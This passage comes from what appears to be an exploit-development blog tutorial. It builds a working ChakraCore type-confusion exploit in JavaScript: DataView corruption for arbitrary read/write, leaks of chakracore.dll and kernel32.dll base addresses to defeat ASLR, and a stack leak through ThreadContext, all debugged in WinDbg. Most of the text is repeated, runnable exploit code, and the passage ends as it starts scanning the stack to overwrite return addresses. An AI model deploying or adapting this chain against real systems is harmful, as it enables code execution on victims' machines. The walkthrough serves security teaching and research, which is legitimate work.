dataview1.setUint32(0x3C, 0x41414141, true);		// Overwrite dataview2->buffer with 0x41414141

Now dataview2->buffer would be overwritten with 0x4141414141414141. Let’s consider the following code now:

dataview2.setUint32(0x0, 0x42424242, true);
dataview2.setUint32(0x4, 0x42424242, true);

If we invoke setUint32() on dataview2, we do so at an offset of 0. This is because we are not attempting to corrupt any other objects, we are intending to use dataview2.setUint32() in a legitimate fashion. When dataview2->setUint32() is invoked, it will fetch the address of the buffer from dataview2 by locating dataview2+0x38, derefencing the address, and attempting to write the value 0x4242424242424242 (as seen above) into the address.

The issue is, however, is that we used a type confusion vulnerability to update dataview2->buffer to a different address (in this case an invalid address of 0x4141414141414141). This is the address dataview2 will now attempt to write to, which obviously will cause an access violation.

Let’s do a test run of an arbitrary write primitive to overwrite the first 8 bytes of the .data section of kernel32.dll (which is writable) to see this in action. To do so, let’s update our exploit.js script to the following:

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    // Print debug statement
    print("DEBUG");

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // Set dataview2->buffer to kernel32.dll .data section (which is writable)
    dataview1.setUint32(0x38, 0x5b3d0000+0xa4000, true);
    dataview1.setUint32(0x3C, 0x00007fff, true);

    // Overwrite kernel32.dll's .data section's first 8 bytes with 0x4141414141414141
    dataview2.setUint32(0x0, 0x41414141, true);
    dataview2.setUint32(0x4, 0x41414141, true);
}

main();

Note that in the above code, the base address of the .data section kernel32.dll can be found with the following WinDbg command: !dh kernel32. Recall also that we can only write/read in 32-bit boundaries, as DataView (in Chakra/ChakraCore) only supplies methods that work on unsigned integers as high as a 32-bit boundary. There are no direct 64-bit writes.

Our target address will be kernel32_base + 0xA4000, based on our current version of Windows 10.

Let’s now run our exploit.js script in ch.exe, by way of WinDbg.

To begin the process, let’s first set a breakpoint on our first print() debug statement via ch!WScriptJsrt::EchoCallback. When we hit this breakpoint, after resuming execution, let’s set a breakpoint on chakracore!Js::DynamicTypeHandler::AdjustSlots. We aren’t particularly interested in this function, which as we know will perform the type transition on our o object as a result of the tmp function setting its prototype, but we know that in the call stack we will see the address of the JIT’d function opt(), which performs the type confusion vulnerability.

Examining the call stack, we can clearly see our opt() function.

Let’s set a breakpoint on the instruction which will overwrite the auxSlots pointer of the o object.

We can inspect R15 and R11 to confirm that we have our o object, who’s auxSlots pointer is about to be overwritten with the obj object.

We can clearly see that the o->auxSlots pointer is updated with the address of obj.

This is exactly how we would expect our vulnerability to behave. After the opt(o, o, obj) function is called, the next step in our script is the following:

// Corrupt obj->auxSlots with the address of the first DataView object
o.c = dataview1;

We know that by setting a value on o.c we will actually end up corrupting obj->auxSlots with the address of our first DataView object. Recalling the previous image, we know that obj->auxSlots is located at 0x12b252a52b0.

Let’s set a hardware breakpoint to break whenever this address is written to at an 8-byte alignment.

Taking a look at the disassembly, it is clear to see how SetSlotUnchecked indexes the auxSlots array (or what it thinks is the auxSlots array) by computing an index into an array.

Let’s take a look at the RCX register, which should be obj->auxSlots (located at 0x12b252a52b0).

However, we can see that the value is no longer the auxSlots array, but is actually a pointer to a DataView object! This means we have successfully overwritten obj->auxSlots with the address of our dataview DataView object!

Now that our o.c = dataview1 operation has completed, we know the next instruction will be as follows:

// Corrupt dataview1->buffer with the address of the second DataView object
obj.h = dataview2;

Let’s update our script to set our print() debug statement right before the obj.h = dataview2 instruction and restart execution in WinDbg.

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Print debug statement
    print("DEBUG");

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // Set dataview2->buffer to kernel32.dll .data section (which is writable)
    dataview1.setUint32(0x38, 0x5b3d0000+0xa4000, true);
    dataview1.setUint32(0x3C, 0x00007fff, true);

    // Overwrite kernel32.dll's .data section's first 8 bytes with 0x4141414141414141
    dataview2.setUint32(0x0, 0x41414141, true);
    dataview2.setUint32(0x4, 0x41414141, true);
}

main();

We know from our last debugging session that the function chakracore!Js::DynamicTypeHandler::SetSlotUnchecked was responsible for updating o.c = dataview1. Let’s set another breakpoint here to view our obj.h = dataview2 line of code in action.

After hitting the breakpoint, we can examine the RCX register, which contains the in-scope dynamic object passed to the SetSlotUnchecked function. We can clearly see this is our obj object, as obj->auxSlots points to our dataview1 DataView object.

We can then set a breakpoint on our final mov qword ptr [rcx+rax*8], rdx instruction, which we previously have seen, which will perform our obj.h = dataview2 instruction.

After hitting the instruction, we can can see that our dataview1 object is about to be operated on, and we can see that the buffer of our dataview1 object currently poitns to 0x24471ebed0.

After the write operation, we can see that dataview1->buffer now points to our dataview2 object.

Again, to reiterate, we can do this type of operation because of our type confusion vulnerability, where ChakraCore doesn’t know we have corrupted obj->auxSlots with the address of another object, our dataview1 object. When we execute obj.h = dataview2, ChakraCore treats obj as still having a valid auxSlots pointer, which it doesn’t, and it will attempt to update the obj.h entry within auxSlots (which is really a DataView object). Because dataview1->buffer is stored where ChakraCore thinks obj.h is stored, we corrupt this value to the address of our second DataView object, dataview2.

Let’s now set a breakpoint, as we saw earlier in the blog post, on the setUint32() method of our DataView object, which will perform the final object corruption and, shortly, our arbitrary write. We also can entirely clear out all other breakpoints.

After hitting our breakpoint, we can then scroll through the disassembly of EntrySetUint32() and set a breakpoint on chakracore!Js::DataView::SetValue, as we have previously showcased in this blog post.

After hitting this breakpoint, we can scroll through the disassembly and set a final breakpoint on the other SetValue() method.

Within this method function, we know mov dword ptr [rax], ecx is the instruction responsible ultimately for writing to the in-scope DataView object’s buffer. Let’s clear out all breakpoints, and focus solely on this instruction.

After hitting this breakpoint, we know that RAX will contain the address we are going to write into. As we talked about in our exploitation strategy, this should be dataview2->buffer. We are going to use the setUint32() method provided by dataview1 in order to overwrite dataview2->buffer’s address with a raw 64-bit value (broken up into two write operations).

Looking in the RCX register above, we can also actually see the “lower” part of kernel32.dll’s .data section - the target address we would like to perform an arbitrary write to.

We now can step through the mov dword ptr [rax], ecx instruction and see that dataview2->buffer has been partially overwritten (the lower 4 bytes) with the lower 4 bytes of kernel32.dll’s .data section!

Perfect! We can now press g in the debugger to hit the mov dword ptr [rax], ecx instruction again. This time, the setUint32() operation should write the upper part of the kernel32.dll .data section’s address, thus completing the full pointer-sized arbitrary write primitive.

After hitting the breakpoint and stepping through the instruction, we can inspect RAX again to confirm this is dataview2 and we have fully corrupted the buffer pointer with an arbitrary address 64-bit address with no NaN-boxing effect! This is perfect, because the next time dataview2 goes to set its buffer, it will use the kernel32.dll address we provided, thinking this is its buffer! Because of this, whatever value we now supply to dataview2.setUint32() will actually overwrite kernel32.dll’s .data section! Let’s view this in action by again pressing g in the debugger to see our dataview2.setUint32() operations.

As we can see below, when we hit our breakpoint again the buffer address being used is located in kernel32.dll, and our setUint32() operation writes 0x41414141 into the .data section! We have achieved an arbitrary write!

We then press g in the debugger once more, to write the other 32-bits. This leads to a full 64-bit arbitrary write primitive!

Perfect! What this means is that we can first set dataview2->buffer, via dataview1.setUint32(), to any 64-bit address we would like to overwrite. Then we can use dataview2.setUint32() in order to overwrite the provided 64-bit address! This also bodes true anytime we would like to arbitrarily read/dereference memory!

We simply, as the write primitive, set dataview2->buffer to whatever address we would like to read from. Then, instead of using the setUint32() method to overwrite the 64-bit address, we use the getUint32() method which will instead read whatever is located in dataview2->buffer. Since dataview2->buffer contains the 64-bit address we want to read from, this method simply will read 8 bytes from here, meaning we can read/write in 8 byte boundaries!

Here is our full read/write primitive code.

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
	return ${x.toString(16)};
}

// Arbitrary read function
function read64(lo, hi) {
	dataview1.setUint32(0x38, lo, true); 		// DataView+0x38 = dataview2->buffer
	dataview1.setUint32(0x3C, hi, true);		// We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

	// Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
	// Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
	var arrayRead = new Uint32Array(0x10);
	arrayRead[0] = dataview2.getUint32(0x0, true); 	// 4-byte arbitrary read
	arrayRead[1] = dataview2.getUint32(0x4, true);	// 4-byte arbitrary read

	// Return the array
	return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
	dataview1.setUint32(0x38, lo, true); 		// DataView+0x38 = dataview2->buffer
	dataview1.setUint32(0x3C, hi, true);		// We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

	// Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
	dataview2.setUint32(0x0, valLo, true);		// 4-byte arbitrary write
	dataview2.setUint32(0x4, valHi, true);		// 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // From here we can call read64() and write64()
}

main();

We can see we added a few things above. The first is our hex() function, which really is just for “pretty printing” purposes. It allows us to convert a value to hex, which is obviously how user-mode addresses are represented in Windows.

Secondly, we can see our read64() function. This is practically dentical to what we displayed with the arbitrary write primitive. We use dataview1 to corrupt the buffer of dataview2 with the address we want to read from. However, instead of using dataview2.setUint32() to overwrite our target address, we use the getUint32() method to retrieve 0x8 bytes from our target address.

Lastly, write64() is identical to what we displayed in the code before the code above, where we walked through the process of performing an arbitrary write. We have simply “templatized” the read/write process to make our exploitation much more efficient.

With a read/write primitive, the next step for us will be bypassing ASLR so we can reliably read/write data in memory.

Bypassing ASLR - Chakra/ChakraCore Edition

When it comes to bypassing ASLR, in “modern” exploitation, this requires an information leak. The 64-bit address space is too dense to “brute force”, so we must find another approach. Thankfully, for us, the way Chakra/ChakraCore lays out JavaScript objects in memory will allow us to use our type confusion vulnerability and read primitive to leak a chakracore.dll address quite easily. Let’s recall the layout of a dynamic object in memory.

As we can see above, and as we can recall, the first hidden property of a dynamic object is the vftable. This will always point somewhere into chakracore.dll, and chakra.dll within Edge. Because of this, we can simply use our arbitrary read primitive to set our target address we want to read from to the vftable pointer of the dataview2 object, for instance, and read what this address contains (which is a pointer in chakracore.dll)! This concept is very simple, but we actually can more easily perform it by not using read64(). Here is the corresponding code.

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
	dataview1.setUint32(0x38, lo, true); 		// DataView+0x38 = dataview2->buffer
	dataview1.setUint32(0x3C, hi, true);		// We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

	// Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
	// Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
	var arrayRead = new Uint32Array(0x10);
	arrayRead[0] = dataview2.getUint32(0x0, true); 	// 4-byte arbitrary read
	arrayRead[1] = dataview2.getUint32(0x4, true);	// 4-byte arbitrary read

	// Return the array
	return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
	dataview1.setUint32(0x38, lo, true); 		// DataView+0x38 = dataview2->buffer
	dataview1.setUint32(0x3C, hi, true);		// We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

	// Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
	dataview2.setUint32(0x0, valLo, true);		// 4-byte arbitrary write
	dataview2.setUint32(0x4, valHi, true);		// 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0, true);
	vtableHigh = dataview1.getUint32(4, true);

	// Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
}

main();

We know that in read64() we first corrupt dataview2->buffer with the target address we want to read from by using dataview1.setUint(0x38...). This is because buffer is located at an offset of 0x38 within the a DataView object. However, since dataview1 already acts on the dataview2 object, and we know that the vftable takes up bytes 0x0 through 0x8, as it is the first item of a DataView object, we can just simply using our ability to control dataview2, via dataview1 methods, to just go ahead and retrieve whatever is stored at bytes 0x0 - 0x8, which is the vftable! This is the only time we will perform a read without going through our read64() function (for the time being). This concept is fairly simple, and can be seen by the diagram below.

However, instead of using setUint32() methods to overwrite the vftable, we use the getUint32() method to retrieve the value.

Another thing to notice is we have broken up our read into two parts. This, as we remember, is because we can only read/write 32-bits at a time - so we must do it twice to achieve a 64-bit read/write.

It is important to note that we will not step through the debugger ever read64() and write64() function call. This is because we, in great detail, have already viewed our arbitrary write primitive in action within WinDbg. We already know what it looks like to corrupt dataview2->buffer using the builtin DataView method setUint32(), and then using the same method, on behalf of dataview2, to actually overwrite the buffer with our own data. Because of this, anything performed here on out in WinDbg will be purely for exploitation reasons. Here is what this looks like when executed in ch.exe.

If we inspect this address in the debugger, we can clearly see the is the vftable leaked from DataView!

From here, we can compute the base address of chakracore.dll by determining the offset between the vftable entry leak and the base of chakracore.dll.

The updated code to leak the base address of chakracore.dll can be found below:

    (...)truncated(...)

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakracore.dll
    chakraLo = vtableLo - 0x1961298;
    chakraHigh = vtableHigh;

    // Print update
    print("[+] ChakraCore.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
}

main();

Please note that we will omit all code before opt(o, o, obj) from here on out. This is to save space, and because we won’t be changing any code before then. Notice also, again, we have to store the 64-bit address into two separate variables. This is because we can only access data types up to 32-bits in JavaScript (in terms of Chakra/ChakraCore).

For any kind of code execution, on Windows, we know we will need to resolve needed Windows API function addresses. Our exploit, for this part of the blog series, will invoke WinExec to spawn calc.exe (note that in part three we will be achieving a reverse shell, but since that exploit is much more complex, we first will start by just showing how code execution is possible).

On Windows, the Import Address Table (IAT) stores these needed pointers in a section of the PE. Remember that chakracore.dll isn’t loaded into the process space until ch.exe has executed our exploit.js. So, to view the IAT, we need to run our exploit.js, by way of ch.exe, in WinDbg. We need to set a breakpoint on our print() function by way of ch!WScriptJsrt::EchoCallback.

From here, we can run !dh chakracore to see where the IAT is for chakracore, which should contain a table of pointers to Windows API functions leveraged by ChakraCore.

After locating the IAT, we can simply just dump all the pointers located at chakracore+0x17c0000.

As we can see above, we can see that chakracore_iat+0x40 contains a pointer to kernel32.dll (specifically, kernel32!RaiseExceptionStub). We can use our read primitive on this address, in order to leak an address from kernel32.dll, and then compute the base address of kernel32.dll by the same method shown with the vftable leak.

Here is the updated code to get the base address of kernel32.dll:

    (...)truncated(...)

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakracore.dll
    chakraLo = vtableLo - 0x1961298;
    chakraHigh = vtableHigh;

    // Print update
    print("[+] ChakraCore.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernel32.dll from from ChakraCore's IAT (for who's base address we already have)
    iatEntry = read64(chakraLo+0x17c0000+0x40, chakraHigh);     // KERNEL32!RaiseExceptionStub pointer

    // Store the upper part of kernel32.dll
    kernel32High = iatEntry[1];

    // Store the lower part of kernel32.dll
    kernel32Lo = iatEntry[0] - 0x1d890;

    // Print update
    print("[+] kernel32.dll base address: 0x" + hex(kernel32High) + hex(kernel32Lo));
}

main();

We can see from here we successfully leak the base address of kernel32.dll.

You may also wonder, our iatEntry is being treated as an array. This is actually because our read64() function returns an array of two 32-bit values. This is because we are reading 64-bit pointer-sized values, but remember that JavaScript only provides us with means to deal with 32-bit values at a time. Because of this, read64() stores the 64-bit address in two separated 32-bit values, which are managed by an array. We can see this by recalling the read64() function.

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getUint32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getUint32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

We now have pretty much all of the information we need in order to get started with code execution. Let’s see how we can go from ASLR leak to code execution, bearing in mind Control Flow Guard (CFG) and DEP are still items we need to deal with.

Code Execution - CFG Edition

In my previous post on exploiting Internet Explorer, we achieved code execution by faking a vftable and overwriting the function pointer with our ROP chain. This method is not possible in ChakraCore, or Edge, because of CFG.

CFG is an exploit mitigation that validates any indirect function calls. Any function call that performs call qword ptr [reg] would be considered an indirect function call, because there is now way for the program to know what RAX is pointing to when the call happens, so if an attacker was able to overwrite the pointer being called, they obviously can redirect execution anywhere in memory they control. This exact scenario is what we accomplished with our Internet Explorer vulnerability, but that is no longer possible.

With CFG enabled, anytime one of these indirect function calls is executed, we can now actually check to ensure that the function wasn’t overwritten with a nefarious address, controlled by an attacker. I won’t go into more detail, as I have already written about control-flow integrity on Windows before, but CFG basically means that we can’t overwrite a function pointer to gain code execution. So how do we go about this?

CFG is a forward-edge control-flow integrity solution. This means that anytime a call happens, CFG has the ability to check the function to ensure it hasn’t been corrupted. However, what about other control-flow transfer instructions, like a return instruction?

call isn’t the only way a program can redirect execution to another part of a PE or loaded image. ret is also an instruction that redirects execution somewhere else in memory. The way a ret instruction works, is that the value at RSP (the stack pointer) is loaded into RIP (the instruction pointer) for execution. If we think about a simple stack overflow, this is what we do essentially. We use the primitive to corrupt the stack to locate the ret address, and we overwrite it with another address in memory. This leads to control-flow hijacking, and the attacker can control the program.

Since we know a ret is capable of transferring control-flow somewhere else in memory, and since CFG doesn’t inspect ret instructions, we can simply use a primitive like how a traditional stack overflow works! We can locate a ret address that is on the stack (at the time of execution) in an executing thread, and we can overwrite that return address with data we control (such as a ROP gadget which returns into our ROP chain). We know this ret address will eventually be executed, because the program will need to use this return address to return execution to where it was before a given function (who’s return address we will corrupt) is overwritten.

The issue, however, is we have no idea where the stack is for the current thread, or other threads for that manner. Let’s see how we can leverage Chakra/ChakraCore’s architecture to leak a stack address.

Leaking a Stack Address

In order to find a return address to overwrite on the stack (really any active thread’s stack that is still committed to memory, as we will see in part three), we first need to find out where a stack address is. Ivan Fratric of Google Project Zero posted an issue awhile back about this exact scenario. As Ivan explains, a ThreadContext instance in ChakraCore contains stack pointers, such as stackLimitForCurrentThread. The chain of pointers is as follows: type->javascriptLibrary->scriptContext->threadContext. Notice anything about this? Notice the first pointer in the chain - type. As we know, a dynamic object is laid out in memory where vftable is the first hidden property, and type is the second! We already know we can leak the vftable of our dataview2 object (which we used to bypass ASLR). Let’s update our exploit.js to also leak the type of our dataview2 object, in order to follow this chain of pointers Ivan talks about.

    (...)truncated(...)

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakracore.dll
    chakraLo = vtableLo - 0x1961298;
    chakraHigh = vtableHigh;

    // Print update
    print("[+] ChakraCore.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernel32.dll from from ChakraCore's IAT (for who's base address we already have)
    iatEntry = read64(chakraLo+0x17c0000+0x40, chakraHigh);     // KERNEL32!RaiseExceptionStub pointer

    // Store the upper part of kernel32.dll
    kernel32High = iatEntry[1];

    // Store the lower part of kernel32.dll
    kernel32Lo = iatEntry[0] - 0x1d890;

    // Print update
    print("[+] kernel32.dll base address: 0x" + hex(kernel32High) + hex(kernel32Lo));
}

main();

We can see our exploit controls dataview2->type by way of typeLo and typeHigh.

Let’s now walk these structures in WinDbg to identify a stack address. Load up exploit.js in WinDbg and set a breakpoint on chakracore!Js::DataView::EntrySetUint32. When we hit this function, we know we are bound to see a dynamic object (DataView) in memory. We can then walk these pointers.

After hitting our breakpoint, let’s scroll down into the disassembly and set a breakpoint on the all-familiar SetValue() method.

After setting the breakpoint, we can hit g in the debugger and inspect the RCX register, which should be a DataView object.

The javascriptLibrary pointer is the first item we are looking for, per the Project Zero issue. We can find this pointer at an offset of 0x8 inside the type pointer.

From the javascriptLibrary pointer, we can retrieve the next item we are looking for - a ScriptContext structure. According to the Project Zero issue, this should be at an offset of javascriptLibrary+0x430. However, the Project Zero issue is considering Microsoft Edge, and the Chakra engine. Although we are leveraging CharkraCore, which is identical in most aspects to Chakra, the offsets of the structures are slightly different (when we port our exploit to Edge in part three, we will see we use the exact same offsets as the Project Zero issue). Our ScriptContext pointer is located at javascriptLibrary+0x450.

Perfect! Now that we have the ScriptContext pointer, we can compute the next offset - which should be our ThreadContext structure. This is found at scriptContext+0x3b8 in ChakraCore (the offset is different in Chakra/Edge).

Perfect! After leaking the ThreadContext pointer, we can go ahead and parse this with the dt command in WinDbg, since ChakraCore is open-sourced and we have the symbols.

As we can see above, ChakraCore/Chakra stores various stack addresses within this structure! This is fortunate for us, as now we can use our arbitrary read primitive to locate the stack! The only thing to notice is that this stack address is not from the currently executing thread (our exploiting thread). We can view this by using the !teb command in WinDbg to view information about the current thread, and see how the leaked address fairs.

As we can see, we are 0xed000 bytes away from the StackLimit of the current thread. This is perfectly okay, because this value won’t change in between reboots or ChakraCore being restated. This will be subject to change in our Edge exploit, and we will leak a different stack address within this structure. For now though, let’s use stackLimitForCurrrentThread.

Here is our updated code, including the stack leak.

    (...)truncated(...)

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakracore.dll
    chakraLo = vtableLo - 0x1961298;
    chakraHigh = vtableHigh;

    // Print update
    print("[+] ChakraCore.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernel32.dll from from ChakraCore's IAT (for who's base address we already have)
    iatEntry = read64(chakraLo+0x17c0000+0x40, chakraHigh);     // KERNEL32!RaiseExceptionStub pointer

    // Store the upper part of kernel32.dll
    kernel32High = iatEntry[1];

    // Store the lower part of kernel32.dll
    kernel32Lo = iatEntry[0] - 0x1d890;

    // Print update
    print("[+] kernel32.dll base address: 0x" + hex(kernel32High) + hex(kernel32Lo));

    // Leak type->javascriptLibrary (lcoated at type+0x8)
    javascriptLibrary = read64(typeLo+0x8, typeHigh);

    // Leak type->javascriptLibrary->scriptContext (located at javascriptLibrary+0x450)
    scriptContext = read64(javascriptLibrary[0]+0x450, javascriptLibrary[1]);

    // Leak type->javascripLibrary->scriptContext->threadContext
    threadContext = read64(scriptContext[0]+0x3b8, scriptContext[1]);

    // Leak type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread (located at threadContext+0xc8)
    stackAddress = read64(threadContext[0]+0xc8, threadContext[1]);

    // Print update
    print("[+] Leaked stack from type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread!");
    print("[+] Stack leak: 0x" + hex(stackAddress[1]) + hex(stackAddress[0]));

    // Compute the stack limit for the current thread and store it in an array
    var stackLeak = new Uint32Array(0x10);
    stackLeak[0] = stackAddress[0] + 0xed000;
    stackLeak[1] = stackAddress[1];

    // Print update
    print("[+] Stack limit: 0x" + hex(stackLeak[1]) + hex(stackLeak[0]));
}

main();

Executing the code shows us that we have successfully leaked the stack for our current thread

Now that we have the stack located, we can scan the stack to locate a return address, which we can corrupt to gain code execution.

Locating a Return Address

Now that we have a read primitive and we know where the stack is located. With this ability, we can now “scan the stack” in search for any return addresses. As we know, when a call instruction occurs, the function being called pushes their return address onto the stack. This is so the function knows where to return execution after it is done executing and is ready to perform the ret. What we will be doing is locating the place on the stack where a function has pushed this return address, and we will corrupt it with some data we control.

To locate an optimal return address - we can take multiple approaches. The approach we will take will be that of a “brute-force” approach. This means we put a loop in our exploit that scans the entire stack for its contents. Any address of that starts with 0x7fff we can assume was a return address pushed on to the stack (this is actually a slight misnomer, as other data is located on the stack). We can then look at a few addresses in WinDbg to confirm if they are return addresses are not, and overwrite them accordingly. Do not worry if this seems like a daunting process, I will walk you through it.

Let’s start by adding a loop in our exploit.js which scans the stack.

    (...)truncated(...)

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
